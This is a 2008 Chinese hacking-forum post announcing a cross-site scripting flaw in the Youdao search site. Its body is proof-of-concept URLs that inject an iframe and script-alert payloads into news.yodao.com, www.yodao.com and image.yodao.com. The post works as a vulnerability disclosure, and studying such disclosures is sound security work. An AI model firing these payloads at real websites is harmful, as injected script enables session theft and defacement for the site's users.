‹‹ 上一主题 | 下一主题 ››
发新话题
打印

有道(yodao.com)跨站漏洞(首发)

本主题由 小3 于 2008-8-23 18:47 移动
jxn98310

学前班

帖子
精华
0 
威望
0 度 
金币
39 枚 
最后登录
2008-6-3 
1# 发表于 2008-4-30 18:19  只看该作者

有道(yodao.com)跨站漏洞(首发)

有道(yodao.com)跨站漏洞(首发)
  发现人:Hack_HT(后天技术联盟——A.T.U)

WEB http://hackht.uu1001.com/

测试代码:

http://news.yodao.com/search?q=<iframe%20src=http://www.baidu.com/%20width=1000%20height=200></iframe>&keyfrom=web.top


http://news.yodao.com/<script>alert("hackht.uu1001.com")</script>
http://www.yodao.com/<script>alert("hackht.uu1001.com")</script>
http://image.yodao.com/<script>alert("hackht.uu1001.com")</script>


截图:

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题

Processed in 0.038612 second(s), 6 queries, Gzip enabled